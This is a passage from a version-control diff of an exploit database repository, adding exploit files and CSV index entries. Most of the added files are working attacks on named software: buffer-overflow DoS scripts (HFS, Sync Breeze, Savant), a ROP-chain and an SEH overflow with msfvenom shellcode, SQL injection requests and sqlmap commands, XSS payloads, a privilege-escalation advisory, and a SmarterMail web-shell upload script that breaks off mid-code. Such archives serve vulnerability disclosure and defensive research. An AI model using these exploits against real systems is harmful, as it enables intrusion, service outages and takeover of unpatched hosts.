server. This +results in hfs.exe server crash from an invalid pointer write access +violation. + +Requirements: +hfs.exe must have at least one saved virtual file or folder present. +Test using a remote IP and NOT from the same machine (localhost). + +Dump... + +(e4c.3a8): Access violation - code c0000005 (first/second chance not available) +For analysis of this file, run !analyze -v +WARNING: Stack overflow detected. The unwound frames are extracted from outside normal stack bounds. +eax=000a1390 ebx=000a138c ecx=006eb188 edx=001b0000 esi=00000000 edi=00000002 +eip=777ef8b4 esp=000a0e0c ebp=000a12cc iopl=0 nv up ei pl nz na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 +ntdll!RtlpResolveAssemblyStorageMapEntry+0x18: +777ef8b4 53 push ebx +0:000> !load winext/msec +0:000> !exploitable +WARNING: Stack overflow detected. The unwound frames are extracted from outside normal stack bounds. +*** WARNING: Unable to verify checksum for hfs.exe +Exploitability Classification: EXPLOITABLE +Recommended Bug Title: Exploitable - User Mode Write AV starting at ntdll!RtlpResolveAssemblyStorageMapEntry+0x0000000000000018 (Hash=0x7a29717c.0x325e6a71) + +PROCESS_NAME: hfs.exe + +FOLLOWUP_IP: +hfs+8fad7 +0048fad7 8945f0 mov dword ptr [ebp-10h],eax + +WRITE_ADDRESS: 000a0e08 + + +[References] +https://github.com/rejetto/hfs2/releases/tag/v2.4-rc01 + + +[Exploit/POC] +from socket import * +import time,sys + +#HFS HTTP File Server v2.3m build 300. +#Vendor: www.rejetto.com +#Remote Remote Buffer Overflow DoS +#Note: hfs.exe must have at least one saved virtual file or folder on the target +#test using a remote IP and not from the same machine. +#Discovery: hyp3rlinx +#hyp3rlinx.altervista.org +#ISR: ApparitionSec +#========================================================================= +res="" +once=0 +cnt=0 +max_requests=1666 + +def hfs_dos(): + + global ip,port,length,res,once,cnt,max_requests + + cnt+=1 + + length += 1 + payload = "A"*length + + try: + s=socket(AF_INET, SOCK_STREAM) + s.settimeout(2) + s.connect((ip,port)) + ##bof ="HEAD / HTTP/1.1\r\nHost: "+ip+"Cookie: "+payload+"\r\n\r\n" + bof ="HEAD /?mode="+payload+" HTTP/1.1\r\nHost: "+ip+"\r\n\r\n" + s.send(bof.encode("utf-8")) + if once==0: + once+=1 + res = s.recv(128) + if res != "": + print("Targets up please wait...") + if "HFS 2.3m" not in str(res): + print("[!] Non vulnerable HFS version, exiting :(") + exit() + except Exception as e: + if e != None: + if str(e).find("timed out")!=-1: + if res=="": + print("[!] Target is not up or behind a firewall? :(") + exit() + else: + print("[!] Done!") + exit() + s.close() + + if cnt == max_requests: + return False + return True + + +def msg(): + print("HFS HTTP File Server v2.3m build 300.") + print("Unauthenticated Remote Buffer Overflow (DoS - PoC)") + print("Virtual HFS saved file or folder required.") + print("Run from a different machine (IP) than the target.") + print("By Hyp3rlinx - ApparitionSec\n") + +if __name__=="__main__": + + length=3 + + if len(sys.argv) != 3: + msg() + print("Usage: , ") + exit() + + ip = sys.argv[1] + port = int(sys.argv[2]) + + msg() + + while True: + if not hfs_dos(): + print("[!] Failed, non vuln version or no virtual files exist :(") + break + + + +[POC Video URL] +https://www.youtube.com/watch?v=qQ-EawfXuWY + + +[Network Access] +Remote + + +[Severity] +High + + +[Disclosure Timeline] +Vendor Notification: May 18, 2020 +Vendor reply: May 18, 2020 +Vendor confirm vulnerability: May 19, 2020 +Vendor creates fix: May 20, 2020 +Vendor released new version 2.4 : June 7, 2020 +June 8, 2020 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/php/webapps/48571.txt b/exploits/php/webapps/48571.txt new file mode 100644 index 000000000..e63bf9b0b --- /dev/null +++ b/exploits/php/webapps/48571.txt @@ -0,0 +1,40 @@ +# Exploit Title: Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin) +# Google Dork: N/A +# Date: 2020-06-10 +# Exploit Author: Extinction +# Vendor Homepage: https://adikiss.net/ +# Software Link: https://adikiss.net/2014/06/aplikasi-sistem-informasi-pengumuman-kelulusan-online-2/ +# Version: latest +# Tested on: Linux,windows,macOS + +# Description SpearSecurity : +# CSRF vulnerability was discovered in Sistem kelulusan. +# With this vulnerability, authorized users can be added to the system. + +POC: + + + +
+
+
+ +
+ +
+ +
+
+ +
+
+

CODED BY SPEAR-SECURITY

+

Author Extinction

+ + + +#SpearSecurity-ID \ No newline at end of file diff --git a/exploits/php/webapps/48572.txt b/exploits/php/webapps/48572.txt new file mode 100644 index 000000000..0b1ee7974 --- /dev/null +++ b/exploits/php/webapps/48572.txt @@ -0,0 +1,39 @@ +# Exploit Title: Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) +# Date: 2020-04-17 +# Exploit Author: Mehmet Kelepçe / Gais Cyber Security +# Vendor Homepage: https://www.j2store.org/ +# Software Link: https://www.j2store.org/download.html +# Reference: https://www.j2store.org/download-j2store/j2store-v3-3-3-13.html +# Change Log: https://www.j2store.org/download-j2store/j2store-v3-3-3-13.html +# Version: 3.3.11 +# Tested on: Kali Linux - Apache2 +-------------------------------------------------------------------------------- +Detail: +-------------------------------------------------------------------------------- +File: administrator/components/com_j2store/models/products.php +Vulnerable parameter: filter_order_Dir, filter_order + +PoC: +Request: +-------------------------------------------------------------------------------- +POST /joomla/administrator/index.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/joomla/administrator/index.php?option=com_j2store&view=products +Content-Type: application/x-www-form-urlencoded +Content-Length: 312 +Connection: close +Cookie: [COOIKE] +Upgrade-Insecure-Requests: 1 + +option=com_j2store&view=products&task=browse&boxchecked=0&filter_order=[SQLi]&filter_order_Dir=[SQLi]&2d42ab72d5c2716881de5d802d08ca7f=1&search=1&product_type=0&limit=20&since=&until=&productid_from=&productid_to=&pricefrom=&priceto=&sku=&manufacturer_id=&vendor_id=&taxprofile_id=&visible=&limitstart=0 +-------------------------------------------------------------------------------- + + + +sqlmap -r sqli --dbs --risk=3 --level=5 --random-agent -p filter_order_Dir + +-------------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/48574.txt b/exploits/php/webapps/48574.txt new file mode 100644 index 000000000..026b70661 --- /dev/null +++ b/exploits/php/webapps/48574.txt @@ -0,0 +1,24 @@ +# Exploit Title: Virtual Airlines Manager 2.6.2 - 'id' SQL Injection +# Date: 2020-06-09 +# Exploit Author: Mosaaed +# Vendor Homepage: http://virtualairlinesmanager.net/ +# Dork: N/A +# Affected Version: 2.6.2 +# Tested on: Ubuntu +# CVE : N/A + +------------------- +xss + +http://localhost/vam/index.php?page=plane_info_public®istry_id=“>< +http://localhost/vam/index.php?page=fleet_public&plane_icao=1“>< +http://localhost/vam/index.php?page=hub&hub_id=1“>< +http://localhost/vam/index.php?page=fleet_public&plane_location=1“>< +http://localhost/vam/index.php?page=event&event_id=1“>< +------------------------- +SQL Injection +sqlmap -u "http://localhost/vam/index.php?page=manual_flight_details&ID=10" -p ID --dbs +sqlmap -u "http://localhost/vam/index.php?page=plane_info_public®istry_id=10" -p registry_id --db +sqlmap -u "http://localhost/vam/index.php?page=fleet_public&plane_icao=1" -p plane_icao --dbs +sqlmap -u "http://localhost/vam/index.php?page=hub&hub_id=1" -p hub_id --dbs +sqlmap -u "http://localhost/vam/index.php?page=fleet_public&plane_location=1" -p plane_location --dbs \ No newline at end of file diff --git a/exploits/windows/dos/38079.py b/exploits/windows/dos/38079.py new file mode 100755 index 000000000..643b2d324 --- /dev/null +++ b/exploits/windows/dos/38079.py @@ -0,0 +1,26 @@ +#!/usr/bin/python +import socket +import sys +from struct import pack + +try: + server = sys.argv[1] + port = 80 + size = 260 + + httpMethod = b"GET /" + inputBuffer = b"\x41" * size + httpEndRequest = b"\r\n\r\n" + + buf = httpMethod + inputBuffer + httpEndRequest + + print("Sending evil buffer...") + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((server, port)) + s.send(buf) + s.close() + + print("Done!") + +except socket.error: + print("Could not connect!") \ No newline at end of file diff --git a/exploits/windows/dos/43197.py b/exploits/windows/dos/43197.py new file mode 100755 index 000000000..b2d92853e --- /dev/null +++ b/exploits/windows/dos/43197.py @@ -0,0 +1,8 @@ +#!/usr/bin/python + +buffer = b"http://" +buffer += b"\x41" * 1500 + +f=open("player.m3u","wb") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/43200.py b/exploits/windows/dos/43200.py new file mode 100755 index 000000000..8e53801bf --- /dev/null +++ b/exploits/windows/dos/43200.py @@ -0,0 +1,33 @@ +#!/usr/bin/python +import socket +import sys + +try: + server = sys.argv[1] + port = 80 + size = 800 + inputBuffer = b"A" * size + content = b"username=" + inputBuffer + b"&password=A" + + buffer = b"POST /login HTTP/1.1\r\n" + buffer += b"Host: " + server.encode() + b"\r\n" + buffer += b"User-Agent: Mozilla/5.0 (X11; Linux_86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n" + buffer += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" + buffer += b"Accept-Language: en-US,en;q=0.5\r\n" + buffer += b"Referer: http://10.11.0.22/login\r\n" + buffer += b"Connection: close\r\n" + buffer += b"Content-Type: application/x-www-form-urlencoded\r\n" + buffer += b"Content-Length: "+ str(len(content)).encode() + b"\r\n" + buffer += b"\r\n" + buffer += content + + print("Sending evil buffer...") + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((server, port)) + s.send(buffer) + s.close() + + print("Done!") + +except socket.error: + print("Could not connect!") \ No newline at end of file diff --git a/exploits/windows/dos/44481.py b/exploits/windows/dos/44481.py new file mode 100755 index 000000000..3851463d6 --- /dev/null +++ b/exploits/windows/dos/44481.py @@ -0,0 +1,31 @@ +#!/usr/bin/python +import socket +import sys +from struct import pack + +try: + server = sys.argv[1] + port = 9121 + size = 1000 + + inputBuffer = b"\x41" * size + + header = b"\x75\x19\xba\xab" + header += b"\x03\x00\x00\x00" + header += b"\x00\x40\x00\x00" + header += pack(' \x20 ; \x0D & \x0A => Truncates buffer +# Recreate: +# Turn On DEP: This PC > Properties > Advanced System Settings > Advanced > Performance > Settings > Data Execution Prevention > "Turn on DEP for all programs and services except those I select:" > OK > Restart +# Install > Run Exploit > Copy buffer from poc.txt > Start BandMonitor > Help > Enter Reg Key > Paste > Exploit +# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Modulename +# ------------------------------------------------------------------------------------------- +# 0x12000000 | 0x12057000 | False | True | False | False | False | [ssleay32.dll] +# 0x00400000 | 0x01247000 | False | False | False | False | False | [BandMonitor.exe] +# 0x11000000 | 0x11155000 | False | True | False | False | False | [LIBEAY32.dll] +# ------------------------------------------------------------------------------------------- + +import struct +OS_retSled = '\x41'*400 +retSled = '\x24\x01\x06\x11'*100 #11060124 # retn [LIBEAY32.dll] {PAGE_EXECUTE_READ} +def createRopChain(): + ropGadgets = [ + # HMODULE LoadLibraryA( LPCSTR lpLibFileName); + # $ ==> > 1106905D CALL to LoadLibraryA + # $+4 > 012428B4 FileName = "kernel32.dll" + 0x012126f5, # POP EAX # RETN [BandMonitor.exe] + 0x110e70bc, # kernel32!loadlibrarya [LIBEAY32.dll] + 0x110495ef, # JMP [EAX] [LIBEAY32.dll] + 0x1106905d, # PUSH EAX # POP ESI # RETN [LIBEAY32.dll] + 0x012428B4, # &String = "kernel32.dll\x00" + # EAX&ESI = &kernel32.dll + # FARPROC GetProcAddress( HMODULE hModule, LPCSTR lpProcName); + # $ ==> > 011D53D2 CALL to GetProcAddress + # $+4 > 76C40000 hModule = (KERNEL32) + # $+8 > 0014F6CC ProcNameOrOrdinal = "WinExec" + 0x01226010, # PUSH ESP # AND AL, 4 # POP ECX # POP EDX # RETN [BandMonitor.exe] - [move esp -> ecx] + 0xfffff2D4, # EDX = Offset2String; ECX = ESP + 0x011d53d2, # xchg eax, ecx # ret [BandMonitor.exe] - eax=esp & ecx = "kernel32.dll\x00" + 0x11061ea7, # sub eax, edx # ret [LIBEAY32.dll]- eax=&String="WinExec\d4" + 0x1106905d, # push eax # pop esi # ret [LIBEAY32.dll] - ESI&EAX="WinExec\d4" + 0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a, + # (INC EAX # RETN)*7 [LIBEAY32.dll] + 0x011f282b, # xor [eax], dl # ret [BandMonitor.exe] - ESI="WinExec\x00" + 0x01203a3b, # xchg eax, esi # ret [BandMonitor.exe] - EAX="WinExec\x00" + 0x11084dca, # xchg eax, edx # ret [LIBEAY32.dll] - EDX="WinExec\x00" + 0x012126f5, # POP EAX # RETN [BandMonitor.exe] + 0x110e708c, # kernel32!getprocaddress [LIBEAY32.dll] + 0x1109cdb9, # mov eax, ds:[eax] # ret [LIBEAY32.dll] - EAX = &GetProcAddress + 0x1106CE04, # mov [esp+8], edx # mov [esp+4], ecx # jmp near eax + 0x011d53d2, # xchg eax, ecx # ret [BandMonitor.exe] - ECX=&KERNEL32.WinExec + 0xffffffff, # NOP - Overwritten by GetProcAddress Stack Setup + 0xffffffff, # NOP - Overwritten by GetProcAddress Stack Setup + # Call WinExec( CmdLine, ShowState ); + # CmdLine = "calc" + # ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window + 0x0106a762, # INC ESI # RETN [BandMonitor.exe] - ESI="calc\x" + 0x01203a3b, # xchg eax, esi # ret [BandMonitor.exe] - EAX="calc\xff" + 0x1106905d, # PUSH EAX # POP ESI # RETN [LIBEAY32.dll] - EAX&ESI="calc\xff" + 0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a, # (INC EAX # RETN)*4 [LIBEAY32.dll] + 0x01226014, # POP EDX # RETN [BandMonitor.exe] + 0xffffffff, # dl = 0xff + 0x011f282b, # xor [eax], dl # ret [BandMonitor.exe] - ESI="calc\x00" + 0x01218952, # NEG EDX # RETN [BandMonitor.exe] - EDX=0x01 = SW_SHOWNORMAL + 0x01203a3b, # xchg eax, esi # ret [BandMonitor.exe] - EAX="calc\x00" + 0x1102ce1f, # xchg eax, ecx [LIBEAY32.dll] - ECX="calc\x00" = CmdLine - EAX=&KERNEL32.WinExec + 0x1106CE04, # mov [esp+8], edx # mov [esp+4], ecx # jmp near eax + 0x11060124 # retn [LIBEAY32.dll] - ROP NOP + ] + return ''.join(struct.pack('cacls WinGate.exe +C:\Program Files\WinGate\WinGate.exe NT AUTHORITY\Authenticated Users:(ID)F + NT AUTHORITY\SYSTEM:(ID)F + BUILTIN\Administrators:(ID)F + BUILTIN\Users:(ID)R + APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R + APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R + + +[Affected Component] +WinGate Installation Directory + +[Impact Code execution] +true + +[Impact Denial of Service] +true + +[Impact Escalation of Privileges] +true + +[Impact Information Disclosure] +true + + +[Exploit/POC] +Logon as standard user replace WinGate.exe with a trojan executable, wait for restart or reboot the system, your code runs as SYSTEM. + + +[Network Access] +Local + + +[Severity] +High + + +[Disclosure Timeline] +Vendor Notification: May 10, 2020 +Vendor acknowledgement: May 10, 2020 +Vulnerability confirmed: May 18, 2020 +Request status: May 22, 2020 +No reply +Notify vendor request CVE: May 26, 2020 +No reply +Advised of public disclosure: June 1, 2020 +No reply +June 4, 2020 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index d49a0543a..b4b44ad01 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6737,6 +6737,10 @@ id,file,description,date,author,type,platform,port 48502,exploits/windows/dos/48502.py,"Konica Minolta FTP Utility 1.0 - 'NLST' Denial of Service (PoC)",2020-05-22,Socket_0x03,dos,windows, 48503,exploits/windows/dos/48503.py,"Filetto 1.0 - 'FEAT' Denial of Service (PoC)",2020-05-22,Socket_0x03,dos,windows, 48521,exploits/multiple/dos/48521.py,"BIND - 'TSIG' Denial of Service",2020-05-20,"Teppei Fukuda",dos,multiple, +43200,exploits/windows/dos/43200.py,"Sync Breeze Enterprise 10.0.28 - Denial of-Service (PoC)",2017-09-27,"Mr Bruce",dos,windows, +44481,exploits/windows/dos/44481.py,"Sync Breeze Enterprise 10.4.18 - Denial of-Service (PoC)",2018-04-01,"Mr Bruce",dos,windows, +38079,exploits/windows/dos/38079.py,"Savant Web Server 3.1 - Denial of-Service (PoC)",2012-01-22,DDD004,dos,windows, +43197,exploits/windows/dos/43197.py,"ALLPlayer 7.5 - Denial of-Service (PoC)",2017-11-27,"Kiefer Bauer",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -11087,6 +11091,8 @@ id,file,description,date,author,type,platform,port 48543,exploits/windows/local/48543.txt,"IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path",2020-06-04,Gobinathan,local,windows, 48563,exploits/windows/local/48563.py,"Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC)",2020-06-08,"Paras Bhatia",local,windows, 48564,exploits/windows/local/48564.py,"Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH)",2020-06-08,"Felipe Winsnes",local,windows, +48570,exploits/windows/local/48570.py,"10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR)",2020-06-10,boku,local,windows, +48573,exploits/windows/local/48573.txt,"WinGate 9.4.1.5998 - Insecure Folder Permissions",2020-06-10,hyp3rlinx,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -18167,6 +18173,7 @@ id,file,description,date,author,type,platform,port 48514,exploits/hardware/remote/48514.rb,"Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)",2020-05-25,Metasploit,remote,hardware, 48537,exploits/windows/remote/48537.py,"Microsoft Windows - 'SMBGhost' Remote Code Execution",2020-06-02,chompie1337,remote,windows, 48540,exploits/linux/remote/48540.py,"vCloud Director 9.7.0.15498291 - Remote Code Execution",2020-06-02,aaronsvk,remote,linux, +48569,exploits/multiple/remote/48569.py,"HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)",2020-06-10,hyp3rlinx,remote,multiple, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -42793,3 +42800,6 @@ id,file,description,date,author,type,platform,port 48562,exploits/php/webapps/48562.txt,"Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection",2020-06-08,"Pankaj Kumar Thakur",webapps,php, 48567,exploits/php/webapps/48567.txt,"Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection",2020-06-09,"Kostadin Tonev",webapps,php, 48568,exploits/php/webapps/48568.py,"Bludit 3.9.12 - Directory Traversal",2020-06-09,"Luis Vacacas",webapps,php, +48571,exploits/php/webapps/48571.txt,"Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)",2020-06-10,Extinction,webapps,php, +48572,exploits/php/webapps/48572.txt,"Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)",2020-06-10,"Mehmet Kelepçe",webapps,php, +48574,exploits/php/webapps/48574.txt,"Virtual Airlines Manager 2.6.2 - 'id' SQL Injection",2020-06-10,Mosaaed,webapps,php, From 0fc783630a9ce64d27cffe4744ea2c0c408a36f9 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 12 Jun 2020 05:01:56 +0000 Subject: [PATCH 12/17] DB: 2020-06-12 1 changes to exploits/shellcodes Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC) --- exploits/windows/local/48579.py | 67 +++++++++++++++++++++++++++++++++ files_exploits.csv | 1 + 2 files changed, 68 insertions(+) create mode 100755 exploits/windows/local/48579.py diff --git a/exploits/windows/local/48579.py b/exploits/windows/local/48579.py new file mode 100755 index 000000000..b74eed89d --- /dev/null +++ b/exploits/windows/local/48579.py @@ -0,0 +1,67 @@ +# Exploit Title: Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC) +# Vendor Homepage: http://www.frigate3.com/ +# Software Link Download: http://www.frigate3.com/download/frigate3_pro.exe +# Exploit Author: Paras Bhatia +# Discovery Date: 2020-06-04 +# Vulnerable Software: Frigate Professional +# Version: 3.36.0.9 +# Vulnerability Type: Local Buffer Overflow +# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English) + +#Steps to Produce the Crash: + +# 1.- Run python code: FrigateLCE.py +# 2.- Copy content to clipboard +# 3.- Turn off DEP for Frigate3.exe +# 4.- Open "Frigate3.exe" +# 5.- Go to "Disk" > Find Computer +# 6.- Paste ClipBoard into the "Computer Name:" field +# 7.- Click on OK +# 8.- Calc.exe runs + + +################################################################################################################################################# + +#Python "FrigateLCE.py" Code: + +f= open("FrigateLCE.txt", "w") + +junk="A" * 4112 + +nseh="\xeb\x20\x90\x90" + +seh="\x4B\x0C\x01\x40" + +#40010C4B 5B POP EBX +#40010C4C 5D POP EBP +#40010C4D C3 RETN +#POP EBX ,POP EBP, RETN | [rtl60.bpl] (C:\Program Files\Frigate3\rtl60.bpl) + +nops="\x90" * 50 + +# msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed -b "\x00\x14\x09\x0a\x0d" -f python + +buf = "" +buf += "\xbf\xe3\xfa\x7b\x97\xdb\xd5\xd9\x74\x24\xf4\x5d\x2b" +buf += "\xc9\xb1\x30\x83\xed\xfc\x31\x7d\x0f\x03\x7d\xec\x18" +buf += "\x8e\x6b\x1a\x5e\x71\x94\xda\x3f\xfb\x71\xeb\x7f\x9f" +buf += "\xf2\x5b\xb0\xeb\x57\x57\x3b\xb9\x43\xec\x49\x16\x63" +buf += "\x45\xe7\x40\x4a\x56\x54\xb0\xcd\xd4\xa7\xe5\x2d\xe5" +buf += "\x67\xf8\x2c\x22\x95\xf1\x7d\xfb\xd1\xa4\x91\x88\xac" +buf += "\x74\x19\xc2\x21\xfd\xfe\x92\x40\x2c\x51\xa9\x1a\xee" +buf += "\x53\x7e\x17\xa7\x4b\x63\x12\x71\xe7\x57\xe8\x80\x21" +buf += "\xa6\x11\x2e\x0c\x07\xe0\x2e\x48\xaf\x1b\x45\xa0\xcc" +buf += "\xa6\x5e\x77\xaf\x7c\xea\x6c\x17\xf6\x4c\x49\xa6\xdb" +buf += "\x0b\x1a\xa4\x90\x58\x44\xa8\x27\x8c\xfe\xd4\xac\x33" +buf += "\xd1\x5d\xf6\x17\xf5\x06\xac\x36\xac\xe2\x03\x46\xae" +buf += "\x4d\xfb\xe2\xa4\x63\xe8\x9e\xe6\xe9\xef\x2d\x9d\x5f" +buf += "\xef\x2d\x9e\xcf\x98\x1c\x15\x80\xdf\xa0\xfc\xe5\x10" +buf += "\xeb\x5d\x4f\xb9\xb2\x37\xd2\xa4\x44\xe2\x10\xd1\xc6" +buf += "\x07\xe8\x26\xd6\x6d\xed\x63\x50\x9d\x9f\xfc\x35\xa1" +buf += "\x0c\xfc\x1f\xc2\xd3\x6e\xc3\x05" + + +payload = junk + nseh + seh + nops + buf + +f.write(payload) +f.close \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b4b44ad01..1364a99ad 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11093,6 +11093,7 @@ id,file,description,date,author,type,platform,port 48564,exploits/windows/local/48564.py,"Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH)",2020-06-08,"Felipe Winsnes",local,windows, 48570,exploits/windows/local/48570.py,"10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR)",2020-06-10,boku,local,windows, 48573,exploits/windows/local/48573.txt,"WinGate 9.4.1.5998 - Insecure Folder Permissions",2020-06-10,hyp3rlinx,local,windows, +48579,exploits/windows/local/48579.py,"Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC)",2020-06-11,"Paras Bhatia",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 From d2b3291be545c86f0a8eda65a411d5b44ae49e3d Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 13 Jun 2020 05:01:56 +0000 Subject: [PATCH 13/17] DB: 2020-06-13 3 changes to exploits/shellcodes Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) SmarterMail 16 - Arbitrary File Upload Avaya IP Office 11 - Password Disclosure Sysax MultiServer 6.90 - Reflected Cross Site Scripting --- exploits/multiple/webapps/48580.py | 134 ++++++++++++++++++++++++++++ exploits/multiple/webapps/48581.txt | 93 +++++++++++++++++++ exploits/multiple/webapps/48582.txt | 17 ++++ files_exploits.csv | 5 +- 4 files changed, 248 insertions(+), 1 deletion(-) create mode 100755 exploits/multiple/webapps/48580.py create mode 100644 exploits/multiple/webapps/48581.txt create mode 100644 exploits/multiple/webapps/48582.txt diff --git a/exploits/multiple/webapps/48580.py b/exploits/multiple/webapps/48580.py new file mode 100755 index 000000000..4b2f40ede --- /dev/null +++ b/exploits/multiple/webapps/48580.py @@ -0,0 +1,134 @@ +# Exploit Title: SmarterMail 16 - Arbitrary File Upload +# Google Dork: inurl:/interface/root +# Date: 2020-06-10 +# Exploit Author: vvhack.org +# Vendor Homepage: https://www.smartertools.com +# Software Link: https://www.smartertools.com +# Version: 16.x +# Tested on: Windows +# CVE : N/A + +#!/usr/bin/python3 +import requests, json, argparse +from requests_toolbelt.multipart.encoder import MultipartEncoder + +#example usage: +#Authenticated +#python3 exp.py -w http://mail.site.com/ -f ast.aspx +#Change username & password ! + +class Tak: + + def __init__(self): + self.file_upload() + self.shell_upload() + + def loginned(self): + self.urls = results.wbsn + '/api/v1/auth/authenticate-user' + self.myobja = {"username":"mail@mail.com","password":"password","language":"en"} + self.xx = requests.post(self.urls, data = self.myobja) + self.data = json.loads(self.xx.text) + self.das = self.data['accessToken'] + self.headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0', 'Authorization': "Bearer " + self.das} + + def loginned_folder(self): + self.loginned() + self.url = results.wbsn + '/api/v1/mail/messages' + myobj = {"folder":"drafts","ownerEmailAddress":"","sortType":5,"sortAscending":"false","query":"","skip":0,"take":151,"selectedIds":[]} + x = requests.post(self.url, data = myobj, headers=self.headers) + print(x.text) + + def create_folder(self): + self.loginned() + self.urlz = results.wbsn + '/api/v1/filestorage/folder-put' + myobj = {"folder": "testos1", "parentFolder":"Root Folder\\"} + myobj2= {"folder": "testos2", "parentFolder":"Root Folder\\"} + x = requests.post(self.urlz, data = myobj, headers=self.headers) + x = requests.post(self.urlz, data = myobj2, headers=self.headers) + print(x.text) + + def file_upload(self): + self.create_folder() + ''' + #resumableChunkNumber=1& + #resumableChunkSize=2097152&resumableCurrentChunkSize=955319&resumableTotalSize=955319& + #resumableType=image%2Fjpeg&resumableIdentifier=955319-112097jpg&resumableFilename=112097.jpg& + #resumableRelativePath=112097.jpg&resumableTotalChunks=1", headers={'User-Agent': "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0", + #'Accept-Language': "en-US,en;q=0.5", 'Accept-Encoding': "gzip, deflate", + 